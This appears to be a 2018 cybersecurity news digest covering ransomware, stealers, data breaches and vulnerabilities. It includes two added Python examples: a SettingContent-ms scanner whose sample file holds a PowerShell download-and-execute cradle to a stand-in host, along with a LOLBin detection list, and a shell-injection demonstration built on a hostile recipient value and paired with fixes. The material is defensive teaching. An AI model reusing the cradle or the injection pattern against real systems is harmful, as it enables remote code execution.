Silobreaker Daily Cyber Digest – 22 October 2018
Kraken Cryptor ransomware 2.0.6 connects to BleepingComputer during encryption
- The new version of Kraken Cryptor was found being distributed via malvertising and the RIG exploit kit. Analysis of file hashes and related data showed that it had infected 217 victims around the world.
- In this variant the encryption routine (smethod_4 in the decompiled code) carries a shortened URL; once encryption finishes, the ransomware connects to BleepingComputer[.]com through that URL.
New version of Azorult spotted in the wild
- Check Point researchers observed a new version of the AZORult stealer, labelled AZORult 3.3, being distributed in the wild. AZORult is an information stealer and malware downloader.
- The new version is distinguished by a new encryption method for obfuscating the C2 domain name, a new C2 connection method, and an improved cryptocurrency wallet stealer and loader.
- AZORult 3.3 was delivered through the RIG exploit kit, among other sources. It was first seen advertised on an underground forum on October 4th, 2018.
Source (Includes IOCs)
New campaign distributing DarkPulsar detected
- Kaspersky researchers have detected a new campaign distributing DarkPulsar, malware allegedly developed by the US National Security Agency (NSA).
- The team made the discovery while analysing two frameworks dumped online by The Shadow Brokers in spring 2017. That leak consisted of numerous NSA surveillance tools and exploits designed to target Windows PCs and servers.
- DarkPulsar is a backdoor typically found on Windows Server 2003/2008 hosts. The researchers identified around 50 victims in Russia, Iran and Egypt, in sectors including nuclear energy, telecommunications, IT, aerospace and R&D.
Microsoft accuses Russia of using phishing sites to interfere in US elections
- Microsoft’s Digital Crimes Unit reportedly used court orders 12 times since 2016 to shut down internet domains and fake websites associated with APT28.
- Microsoft is concerned that APT28 is using these websites, resembling those of American political parties and connected groups, to attempt to influence the 2018 elections.
SettingContent-ms files can be abused to deliver DeepLink and Icon-based payload
- Trend Micro researchers have found that Microsoft's SettingContent-ms files may be abused through their DeepLink and Icon tags.
- By replacing the command line under the DeepLink tag, a PowerShell script can be made to download and execute a payload from a malicious site. The same works under the Icon tag, which additionally permits long, complicated or obfuscated scripts.
- SettingContent-ms files were introduced with Windows 10. They hold shortcuts to Windows settings content, such as the update process and the default applications used to open specific file types.
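The abuse described above leaves a visible trace in the file itself: the DeepLink or Icon value stops being a path to control.exe and becomes a command line. The following added example (not Trend Micro's code, and not a real sample) parses a SettingContent-ms file and flags DeepLink/Icon values that name a script interpreter or LOLBin, embed a URL, or are implausibly long. Both sample files, the AppID, the example.invalid URL and the 260-character threshold are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample files (hypothetical, not real malware). The first is modelled on
# the stock format, with both tags pointing at control.exe. The second has the DeepLink
# command line swapped for a PowerShell download cradle, as described above.
BENIGN_SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\system32\control.exe</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>
"""

HOSTILE_SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"</DeepLink>
      <Icon>%windir%\system32\control.exe</Icon>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>
"""

# Interpreters and living-off-the-land binaries that have no business in a settings shortcut.
INTERPRETER_RE = re.compile(
    r"\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32|certutil|bitsadmin|msiexec)(\.exe)?\b",
    re.IGNORECASE,
)
URL_RE = re.compile(r"\b(https?|ftp)://", re.IGNORECASE)
MAX_SANE_LENGTH = 260  # assumption: a legitimate path-like value fits within MAX_PATH


def _local_name(tag):
    """Strip the XML namespace so matching does not depend on the xmlns declaration."""
    return tag.rsplit("}", 1)[-1]


def scan_setting_content(xml_text):
    """Return a list of findings for DeepLink and Icon values that look like command lines."""
    # xml.etree is used for brevity; when scanning untrusted files in production,
    # parse with defusedxml to rule out entity-expansion tricks.
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        name = _local_name(elem.tag)
        if name not in ("DeepLink", "Icon"):
            continue
        value = (elem.text or "").strip()
        reasons = []
        if INTERPRETER_RE.search(value):
            reasons.append("script interpreter or LOLBin")
        if URL_RE.search(value):
            reasons.append("embedded URL")
        if len(value) > MAX_SANE_LENGTH:
            reasons.append("unusually long value")
        if reasons:
            findings.append({"tag": name, "reasons": reasons, "value": value[:80]})
    return findings


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SAMPLE), ("hostile", HOSTILE_SAMPLE)):
        print(label, scan_setting_content(sample))
```

The length check exists because, as noted above, the Icon tag in particular can carry long obfuscated scripts that the interpreter and URL patterns may not match; tune the threshold against legitimate files from your own estate before relying on it.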
Leaks and Breaches
Yale University hit with second lawsuit over decade-old data breach
- Yale University suffered a breach between April 2008 and January 2009 that compromised students' electronic records, including Social Security numbers, dates of birth, email and home addresses.
- The lawsuit, brought by plaintiff Andrew Mason, claims that Yale stored the personal data improperly, allowing the breach to occur.
US Government computer system interacting with Healthcare[.]gov breached
- The Centers for Medicare and Medicaid Services stated that a government system used by healthcare insurance agents and brokers was hacked, resulting in the compromise of 75,000 people’s data.
Adult websites hacked exposing personal data
- Eight adult websites were hacked, leading to the exposure of 98MB of personal data. The exposed data includes IP addresses, user passwords protected by an outdated cryptographic scheme, names and 1.2 million unique email addresses. The websites have been taken down and users are encouraged to change their passwords.
Grand Theft Auto (GTA) update allows cheats to harass other players in single player modes
- The Grand Theft Auto game update 1.45 reportedly allowed mod menu users to target their exploits using unique ID codes from Rockstar Social Club. Once a player’s ID number was found, the server-mod-style exploits could be used against anyone providing they are logged in.
- One player named ‘SnowieLive’ had a cheater interrupt his stream by kicking him out of his session and claiming to be an administrator with GTA. When SnowieLive restarted in single player mode, he began dropping dead as soon as the game began, and received an in-game chat message stating ‘Ur not safe in singleplayer’, which should not be possible outside of multi-player mode.
Drupal patches several critical security issues in Drupal Core
- The security update addresses two critical and several moderately critical flaws in Drupal core versions 7.x and 8.x.
- The first critical flaw, reported for Drupal 8, is an injection in DefaultMailSystem::mail(): some values in outgoing emails were not sanitised for use as shell arguments, which could lead to remote code execution.
- The second critical flaw, also in Drupal 8, lies in contextual links validation: the Contextual Links module does not sufficiently validate the requested contextual links, which can also lead to remote code execution.
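The DefaultMailSystem flaw above is an instance of a general bug class: a value taken from a message, such as a recipient address, interpolated into the command line used to invoke the mail transport. The following added example is not Drupal's code (it is Python rather than PHP) and uses echo as a stand-in for the transport binary, so nothing is sent. It shows the injection with a constructed hostile recipient and three fixes: quoting the argument (shlex.quote, the analogue of PHP's escapeshellarg), invoking the program without a shell at all, and validating the address before it reaches any command.

```python
import re
import shlex
import subprocess

# Stand-in for a mail transport binary: it only prints its arguments. Real code
# would invoke a sendmail-style binary here; the bug and the fixes are the same.
TRANSPORT = "echo sending-to"

# Constructed hostile recipient: a valid-looking address followed by shell metacharacters.
HOSTILE_RECIPIENT = "victim@example.com; echo INJECTED"


def unsafe_command(recipient):
    """Vulnerable pattern: the value is interpolated straight into a shell command line."""
    return f"{TRANSPORT} {recipient}"


def quoted_command(recipient):
    """Fix 1: quote the value so the shell sees exactly one argument (cf. PHP escapeshellarg)."""
    return f"{TRANSPORT} {shlex.quote(recipient)}"


def run_via_shell(command):
    """Run a command line through /bin/sh, as shell=True or PHP's shell_exec would."""
    return subprocess.run(["sh", "-c", command], capture_output=True, text=True).stdout


def run_without_shell(recipient):
    """Fix 2 (preferred): pass an argv list, so no shell ever parses the value."""
    return subprocess.run(["echo", "sending-to", recipient], capture_output=True, text=True).stdout


# Deliberately strict: accept plain addresses only, nothing a shell could interpret.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def validate_recipient(recipient):
    """Fix 3: reject anything that is not a plain address before it reaches any command."""
    if not ADDRESS_RE.fullmatch(recipient):
        raise ValueError(f"refusing suspicious recipient: {recipient!r}")
    return recipient


if __name__ == "__main__":
    print("unsafe  :", repr(run_via_shell(unsafe_command(HOSTILE_RECIPIENT))))
    print("quoted  :", repr(run_via_shell(quoted_command(HOSTILE_RECIPIENT))))
    print("no shell:", repr(run_without_shell(HOSTILE_RECIPIENT)))
    try:
        validate_recipient(HOSTILE_RECIPIENT)
    except ValueError as exc:
        print("validate:", exc)
```

With the unsafe command line the shell runs the second command and the output contains INJECTED on its own line; with quoting or an argv list the whole hostile string is passed through as one harmless argument. Quoting alone still leaves the transport binary free to interpret a value that begins with a dash as an option, which is why validation of the address format is worth keeping as well.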
Vulnerabilities discovered in WD My Book and more
- WizCase security researchers discovered multiple critical vulnerabilities in WD My Book, NetGear Stora, SeaGate Home and Medion LifeCloud NAS.
- The four NAS devices all suffer from two zero-day unauthenticated root remote command execution vulnerabilities (CVE-2018-18472 and CVE-2018-18471). An attacker could exploit them to read files, modify data, add or remove users and execute commands as root.
- Almost 2 million affected devices are exposed online.
FreeRTOS vulnerabilities expose several systems to attacks
- FreeRTOS is an open source operating system built specifically for microcontrollers and used in industrial applications, B2B solutions and consumer products. Zimperium's zLabs analysed FreeRTOS's TCP/IP stack and AWS secure connectivity modules and found over a dozen vulnerabilities, which also affect OpenRTOS and SafeRTOS.
- They include four remote code execution flaws, one denial of service and seven information leak issues. zLabs stated that the vulnerabilities could allow an attacker to leak information from the device's memory, crash the device, or execute code remotely.
Critical flaw found in LIVE555 Streaming Media RTSPServer
- Cisco Talos researchers disclosed a critical code execution vulnerability, tracked as CVE-2018-4013, in Live Networks LIVE555 Streaming Media RTSPServer. LIVE555 Streaming Media is a set of open source C++ libraries for multimedia streaming by Live Networks. It is used by popular software such as VLC and MPlayer.
- The flaw was found in the ‘HTTP packet-parsing functionality of the LIVE555 RTSP server library’. The vulnerability affects LIVE555 Media Server version 0.92, but may also be present in earlier versions of the product.
Twitter takes down bot network distributing pro-Saudi messages mentioning Khashoggi
- Twitter has taken down a bot network that spread pro-Saudi government tweets related to the murder of journalist Jamal Khashoggi. Hundreds of accounts were found to be tweeting and retweeting the same messages, likely as part of a Twitter influence campaign.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.